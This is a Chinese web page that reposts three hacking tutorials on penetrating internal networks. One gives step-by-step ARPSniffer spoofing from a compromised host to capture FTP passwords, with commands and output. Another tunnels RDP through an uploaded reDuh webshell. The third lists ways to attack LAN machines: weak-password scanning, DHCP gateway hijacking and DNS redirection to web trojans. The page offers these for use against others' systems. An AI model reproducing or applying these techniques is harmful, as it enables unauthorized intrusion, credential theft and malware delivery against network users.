欢迎来到个人简历网!永久域名:gerenjianli.cn (个人简历全拼+cn)
当前位置:首页 > 范文大全 > 实用文>ARP监听渗透内网的方法网站安全

ARP监听渗透内网的方法网站安全

2024-10-27 08:07:27 收藏本文 下载本文

“摆渡shopping”通过精心收集,向本站投稿了3篇ARP监听渗透内网的方法网站安全,以下是小编收集整理后的ARP监听渗透内网的方法网站安全,仅供参考,欢迎大家阅读。

ARP监听渗透内网的方法网站安全

篇1:ARP监听渗透内网的方法网站安全

假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆

第一步:

tracert 61.139.1.1

C:/WIN/system32>tracert 61.139.1.1

Tracing route to HACK-4FJ7EARC [61.139.1.1]

over a maximum of 30 hops:

1 <10 ms <10 ms <10 ms HACK-4FJ7EARC [61.139.1.1]

Trace complete.

这就说明了你想攻击的主机和你所在的主机在一个关网中那么就有可能

进行ARPSNIFFER了

第二步:看本机IP设置和网卡情况

C:/WIN2000/system32>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : smscomputer

Primary DNS Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Broadcast

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Intel Fast Ethernet LAN Controller - onboard:

Connection-specific DNS Suffix . :

Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection

Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6

DHCP Enabled. . . . . . . . . . . : No

IP Address. . . . . . . . . . . . : 61.139.1.2

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 61.139.1.65

DNS Servers . . . . . . . . . . . : 61.139.1.73

说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地

方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0

的话也只能嗅探到通过自已的数据哟.

从上面我们还可以知道网关是61.139.1.65

第三步:查看本机时间

C:/WIN2000/system32>net time //127.0.0.1

//127.0.0.1 的当前时间是 /1/28 下午 09:13

命令完成成功

要注意的是这儿的时间是12小时式,用at命令应要24小时式

第四步:编写启动ARPsniffer的bat文件

C:/WIN2000/system32>echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset>c:/winnt/a.bat

注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下:

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter

Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数)

Usage: ArpSniffer [/RESET]

第五步:后台运行开始嗅探咯

C:/winnt/system32>at //127.0.0.1 20:44 c:/winnt/a.bat

注意:这儿的时间要用24小时式

arpsniffer最好拷到system32目录下,记录文件也会生成在这儿

执行完第四步要先安装WINPCAP 2.1驱动

同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子

第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉

以SYSTEM权限启动的ARPSniffer程序

C:/winnt/system32>pulist

...................

conime.exe 248 NT AUTHORITY/SYSTEM

explorer.exe 1864 SMSCOMPUTER/Administrator

CSRSS.EXE 2256 NT AUTHORITY/SYSTEM

Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了!

WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM

......................

杀了它

C:/winnt/system32>pskill 2322

PsKill v1.03 - local and remote process killer

Copyright (C) 2000 Mark Russinovich

Process 2322 killed.

C:/winnt/system32>type 1.txt 我的例子中嗅探的是FTP密码:)

...............

61.188.218.179(1404)->61.139.1.79(21)PASS aaabbb

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.139.1.79(21)->61.188.218.179(1404)530 User czy82 cannot log in.

61.188.218.179(1404)->61.139.1.79(21)QUIT

61.188.218.179(1404)->61.139.1.79(21)QUIT

61.139.1.79(21)->61.188.218.179(1404)221

61.139.1.79(21)->61.188.218.179(1404)221

............

............

特别要注意的就是PASS哈:)

----------------------------------------------------

付录:

前台正常执行的显示

C:/>arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset

ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB

Network Adapter 0: Intel(R) 8255x Based Network Connection

Enable IP Router....OK

Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02

Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb

Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6

Spoof 61.139.1.79: Mac of 61.139.1.65 ===>Mac of 61.139.1.88

Spoof 61.139.1.65: Mac of 61.139.1.79 ===>Mac of 61.139.1.88

有时这儿要先显示can not open driver(0)不管它等一下就可以了

Begin Sniffer.........

篇2:内网渗透利器reduh的使用方法网站安全

国外大牛的作品,偶顺手写了个使用说明,e文好的看原文 www.sensepost.com/research/reduh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机-------客户端---------(http隧道)-----------服务端------------------内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上jdk。

把客户端文件解包,这里我把它放到e盘的test文件夹

把服务端的webshell上传到目标服务器

目标服务器在内网,开了终端服务。

命令行下用客户端连接服务端

e:\test>java reduhclient 目标服务器域名 http 80 /webshell路径/reduh.asp

新开一个命令行,用nc连接本机1010端口,

h:\>nc -vv localhost 1010

连接成功会有欢迎提示,之后输入命令

>>[createtunnel]1234:127.0.0.1:3389

前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。

这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

数据的传递过程

需要注意的是用此工具转发数据速度很慢,连接的时候应尽量把mstsc的颜色设置调低些。

篇3:内网入侵windows xp的思路和方法网站安全

最简单的方法无非就是弱口令了

方法1.弱口令

用到的工具 ntscan ,recton,木马

可惜扫了一下一个弱口令都没有!再用superscan 扫了一下port ,发现7台电脑在线,只有三台没开防火墙,而且只开了137 netbios ,123 ntp等端口 只好放弃此方法

方法2. arp欺骗

用到的工具 arpsniffer

在host os (主系统)运行arpsniffer 却遇上提示driver有问题,晕菜,打开一台guest os (虚拟机) 2k3系统运行arpsniffer没问题,顺便嗅探一下自已,上网页的密码,竟然嗅探不到! FT,我也不知道是什么原因,以前在韩国的肉鸡上嗅探FTP密码是没问题的..也罢,此方法也放弃

方法3. 溢出

但考虑到大多电脑都不是开了防火墙,就是打了补丁,此方法也就罢了!

以下两种方法可能网上文章鲜少提过,我自已后来想出来的,但其实需要具备一个条件就是要有局域网的路由器管理权限

方法4. 利用 dhcp 分发地址更改网关到自已机子并嗅探

首先dhcp 分发的元素中有 ip地址,网关,子网掩码,DNS服务器,还有就是分发元素的有效时间(时间这个很重要)

我们要做的就是把dhcp的租期改成10分钟或更短,并把dhcp原来的网关ip地址(路由器lan口的地址)改成我主机的地址.以让所以客户端的数据流从我的主机上走,以达到嗅探(就像一条河有一个砸门,所有鱼要出去必须经过那个砸门)

dhcp工作的原理:

当一台主机开机启动会发出一个broadcast packet(广播包) 给router,router reviced 到 client os 的request packet(请求包) 就会给client host(客户机)一个reply packet (应答包),但是这个请求的ip信息,有效时间只有10分钟,当时间用掉一半 5分钟后,客户机会再次向router 请求 ip信息,我们把时间租期改短一些可以让客户机短时间内再次请求以恢复用路由做网关.

例:

原数据的流程

all client os  => router => internet

修改dhcp 网关后的数据流程

all client os => my computer os => router  => internet

我这里必须把我主机做为所有客户端的网关,同时又要把router 做为我的网关

注意:DHCP是自动分发地址,如果手动设地址的话,电脑不会发出请求的广播包,所以如果局域网有人用手动设置网关的话,当我改了网关,对方就不能上网.所以这个时候还有一种方法,就是先改路由lan接口的地址(网关),并把我主机的ip地址改成路由器lan口的地址,但是即使如此,之前与路由通讯过的客户端还是会照成短时间的不能上网,因为据转发是根据ip->mac (arp过程),之后根据mac地址转发,这时虽然ip换了,但是系统还是留着原网关的mac地址.所以数据包还是会发给原路由,所以其实是有点矛盾的,当我主机和路由交替了ip之后,网关地址没变,只是换了不同的角色(主机和路由交换),却又因为客户端的系统之前有和网关通讯过的MAC地址缓存,导致数据包继续发给路由器...

(这时只有arp -d 清除mac缓存或重启系统才会使数据包往我主机这里走,但是我们根本没办法清除mac或重启)

所以最好是不要用交替网关地址,而是把原网关地址改掉,但这样有可能手动设置ip和网关就因不能动态获取新网关(我主机)而数据包不从我主机这里走!

方法5. 更改DNS服务器,解析常用到地址到我们的主机

电信通常用的dns服务器地址是202.101.107.54,我们可以改成是内网一台机子192.168.1.3(这是我的一台虚拟机,同样有dns server),这时我在我的2k3上安装dns服务器和iis服务器,建立 163 ,baidu,google,sina,yahoo,hao123等常用网址的解析条目,让凡事访问这些网址都全部解析到192.168.1.1,呵呵,然后我们做一个网页木马!

如果没有网页木马就做一个能吸引人的网页内容,比如****门,嘿,下载吧!做个自解压木马,一运行就中..当然要对方很傻很天真的情况下!

【ARP监听渗透内网的方法网站安全】相关文章:

1.浅谈内网渗透

2.一种少见的跨目录写webshell方法网站安全

3.安全迁移网站的技巧

4.再记一次网站入侵网站安全

5.网站信息安全的协议书

6.提高网站权重的方法是什么

7.提高网站流量的简单方法

8.防患未然 了解网站后门的防范方法以及安全配置WEB安全

9.提高网站整体收录量的方法

10.安全的增高方法

下载word文档
《ARP监听渗透内网的方法网站安全.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度: 评级1星 评级2星 评级3星 评级4星 评级5星
点击下载文档

文档为doc格式

  • 返回顶部